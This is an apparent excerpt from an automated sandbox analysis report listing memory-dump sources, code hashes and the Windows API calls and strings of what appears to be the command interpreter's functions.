                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heapmemset$FreeProcess
                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                          • API String ID: 1291122668-438819550
                                                                                                                                                                                                                          • Opcode ID: d7f3643de6e3a9270e10eadc4abb6dd28a3134739eb00a6bfaecd38be3fc7675
                                                                                                                                                                                                                          • Instruction ID: 90a04929ec1ee308e6fe34ed17f0141cfd745e26fbfeea0cf5e216082eeddbeb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7f3643de6e3a9270e10eadc4abb6dd28a3134739eb00a6bfaecd38be3fc7675
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FB1F175D00209AFDF24EFA4C981BAEBBB1FF6A300F554069E805AB245D731ED41CB91
APIs
• RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001B5997
  • Part of subcall function 0019AB7F: iswspace.MSVCRT ref: 0019AB8D
  • Part of subcall function 0019AB7F: wcschr.MSVCRT ref: 0019AB9E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: Enumiswspacewcschr
• String ID: %s=%s$\Shell\Open\Command
• API String ID: 3493821229-3301834661
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID:
• String ID: GeToken: (%x) '%s'$Ungetting: '%s'
• API String ID: 0-1704545398
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: iswdigit$wcstol
• String ID: aApP
• API String ID: 644763121-2547155087
APIs
• RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001B57F8
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001B5886
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: EnumErrorLast
• String ID: %s=%s$.
• API String ID: 1967352920-4275322459
APIs
• memset.MSVCRT ref: 001BA79F
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 001BA83C
• ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?), ref: 001BA8B5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$DiskFreeSpace
• String ID: %5lu
• API String ID: 2448137811-2100233843
APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 001B3835
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B3847
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ErrorLastOpenSemaphore
• String ID: _p0$wil
• API String ID: 1909229842-1814513734
                                                                                                                                                                                                                          • Opcode ID: 942c942df415c4c60154bd56f62ec0fa5c11c900c03e157a79afc1988a089972
                                                                                                                                                                                                                          • Instruction ID: 3581b8134a7f127594bb94c12aa7d040f9f435e027eac74157eaa15da4c850f2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 942c942df415c4c60154bd56f62ec0fa5c11c900c03e157a79afc1988a089972
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE4117B1E012298BCB25DF29C8586E9B7B5EF94300F1483A9F81AD7250DB70CF45CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 001B239F
                                                                                                                                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 001B23CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateCurrentMutexProcess
                                                                                                                                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil
                                                                                                                                                                                                                          • API String ID: 3937467467-2303653343
                                                                                                                                                                                                                          • Opcode ID: 816f42266d2eb2cba7bb26f6b2f3e013853353c004e775c88f11e354e8e365a2
                                                                                                                                                                                                                          • Instruction ID: 0598122a00e8107e62851414c0a9c9917f597db7e31bdd5b42619873081ae591
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 816f42266d2eb2cba7bb26f6b2f3e013853353c004e775c88f11e354e8e365a2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA411675A402289BCB21EF64DC88EEAB7B5EF94700F1102C5E819A7240DB709F49CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,001BCD40,0000001C,001B6901), ref: 001B56A8
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 001B5778
                                                                                                                                                                                                                            • Part of subcall function 001B64DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B650F
                                                                                                                                                                                                                            • Part of subcall function 001B64DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00), ref: 001B6545
                                                                                                                                                                                                                            • Part of subcall function 001B64DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,001BCD00,00000018,?,?,001ABFD6), ref: 001B6553
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                                                                                                                                                                          • String ID: Software\Classes$p~du
                                                                                                                                                                                                                          • API String ID: 1047774138-3099581464
                                                                                                                                                                                                                          • Opcode ID: 3e385b8c51f8c17f4859b82df36d8fc96b1b98769af9067aa2d29a505415f683
                                                                                                                                                                                                                          • Instruction ID: c8a5c29be7e1ae0734a06af0ded3f20d126a60a7996ea38324c6e77ab12fbc96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e385b8c51f8c17f4859b82df36d8fc96b1b98769af9067aa2d29a505415f683
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7314F75F04714DBDF08ABA998527EDB7B2AF58710F64402EE002BB291EF715C008BA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,001BCCE0,0000001C,001B6931), ref: 001B5E32
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 001B5EFB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$CloseOpeniswspace
                                                                                                                                                                                                                          • String ID: Software\Classes$p~du
                                                                                                                                                                                                                          • API String ID: 2439148603-3099581464
                                                                                                                                                                                                                          • Opcode ID: 0e1b827f37afe1ec80cc765742a298f122b4dbb01569cb4d255222bd007cd3de
                                                                                                                                                                                                                          • Instruction ID: 749688a853a5b2c5560bf3b74dfcf0fe4d0d6a735e4c7b6a0235087fa2f7e01c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1b827f37afe1ec80cc765742a298f122b4dbb01569cb4d255222bd007cd3de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54317371E146148FDF18EFA9C8527EDB7B2AF58710F24402EE016B7291EB719D00DB64
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BB25E
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 001BB2D2
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 001BB30B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_wcslwr
                                                                                                                                                                                                                          • String ID: [%s]
                                                                                                                                                                                                                          • API String ID: 886762496-302437576
                                                                                                                                                                                                                          • Opcode ID: 1bae1b0139d68dc30620f7f76a3d4a79e45ca16e22b57ace3ba792345bdff577
                                                                                                                                                                                                                          • Instruction ID: dda76dd3e071a7811c9a0a46ff2fc28699586332d7c4e5ae066de205c6cd9148
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bae1b0139d68dc30620f7f76a3d4a79e45ca16e22b57ace3ba792345bdff577
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80318071B05219ABDF10DBA9DCC5BEEB7F8AF18350F0800A9E505E3241EB74DE448B90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: _wcsnicmp
• String ID: /-Y$COPYCMD
• API String ID: 1886669725-617350906
• Opcode ID: d53621bd395eaa715bf090b8f706946cec8fbd5bf0923f3b85dc2b02457344e0
• Instruction ID: daf4655f5451aa4521528e6fcea3aa5fbf259246af8b78389d6703f863e3b637
• Opcode Fuzzy Hash: d53621bd395eaa715bf090b8f706946cec8fbd5bf0923f3b85dc2b02457344e0
• Instruction Fuzzy Hash: AF21A07DA00211ABCF2C8B099C457FFB6F5EFCA364B610055E84997244EBF0CE41C260
APIs
  • Part of subcall function 00199E8E: iswspace.MSVCRT ref: 00199E9E
• iswspace.MSVCRT ref: 00199E28
• _wcsnicmp.MSVCRT ref: 00199E79
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: iswspace$_wcsnicmp
• String ID: off
• API String ID: 3989682491-733764931
• Opcode ID: a76dff0610145cdd2048147bacbb8bb809288c0836b180448bb8b19fbbbde23e
• Instruction ID: c57820e572684a2a2d2e8fa6243f84e77703b80c1630afd496630e12916054c5
• Opcode Fuzzy Hash: a76dff0610145cdd2048147bacbb8bb809288c0836b180448bb8b19fbbbde23e
• Instruction Fuzzy Hash: 15112626705311AADF38A26D5C5AB3F63589FE1F55B29002EFD0AEA0C0FB41CD80D1A3
APIs
  • Part of subcall function 001A727B: __iob_func.MSVCRT ref: 001A7280
• fprintf.MSVCRT ref: 001B5182
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: __iob_funcfprintf
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 620453056-2781220306
• Opcode ID: 125d70aeb357fa0d69991199f4bfaa13e5cc9615fe5c8590fd2d0d1a46b20800
• Instruction ID: febc758b7d9d585f3953663de92346726fa5d223d3baa4dbe3972ea14fdaa395
• Opcode Fuzzy Hash: 125d70aeb357fa0d69991199f4bfaa13e5cc9615fe5c8590fd2d0d1a46b20800
• Instruction Fuzzy Hash: B201263BA44B129ACB347B5CAC06BE3A365DBE1324365052BEC6A93180FBA19E438555
APIs
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 001B351B
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 001B352C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RtlDllShutdownInProgress$ntdll.dll
• API String ID: 1646373207-582119455
• Opcode ID: a64c2a4d5c737b124c9161e8ce473a3a6f5a94be2c1570dce70bc126285de189
• Instruction ID: 3ff05778c9f83d4bd0d0da0ec24d01f86b903a125d6e178fd04ccfb124f7b488
• Opcode Fuzzy Hash: a64c2a4d5c737b124c9161e8ce473a3a6f5a94be2c1570dce70bc126285de189
• Instruction Fuzzy Hash: 37E01A31E43230AB8F319F34BD09ADA3BD8AB44BA030A0256F819D3A64D7648D818FD1
APIs
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 001B38FB
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 001B3907
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: RaiseFailFastException$kernelbase.dll
• API String ID: 1646373207-919018592
• Opcode ID: 2b17dc8ad20e19714fb8f3111a778444d578e0b909525623e8fa230271210483
• Instruction ID: fd31b4342823eb743266404ea9e1e11fd0ce28a29d4790e188f2c86cd8c86e3a
• Opcode Fuzzy Hash: 2b17dc8ad20e19714fb8f3111a778444d578e0b909525623e8fa230271210483
• Instruction Fuzzy Hash: F6E08C32502228BBCF211FA1DC0CC8BBF19EF447A17440022F918825208B728960CAA1
APIs
• memset.MSVCRT ref: 001A539E
  • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 001A54C6
  • Part of subcall function 00198E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001D8BF0,00000000,?), ref: 00198EC3
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: memset$CurrentDirectory
• String ID:
• API String ID: 168429351-0
• Opcode ID: 6d4ca9cf11395636657681dfb545c289d62c74ea0a64173579fee51a4e7f03f4
• Instruction ID: a6a4a87de8346a1d1fd6b4a620e9daaf2f4703a91c26faef2e34f45891b24ab3
• Opcode Fuzzy Hash: 6d4ca9cf11395636657681dfb545c289d62c74ea0a64173579fee51a4e7f03f4
• Instruction Fuzzy Hash: 7761787560C7019FD328DF28D4856ABBBE6FF89300F11492EF989C7250EB709984CB96
APIs
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: _wcsnicmp$wcschr
• String ID:
• API String ID: 3270668897-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: iswdigit
• String ID:
• API String ID: 3849470556-0
APIs
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D3A
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D44
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D57
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D61
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_190000_alpha.jbxd
Similarity
• API ID: ErrorMode$FullNamePath
• String ID:
• API String ID: 268959451-0
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0019C5BD
• RtlFreeHeap.NTDLL(00000000), ref: 0019C5C4
• _setjmp3.MSVCRT ref: 0019C630
• VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 0019C69D
Memory Dump Source
• Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
• Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
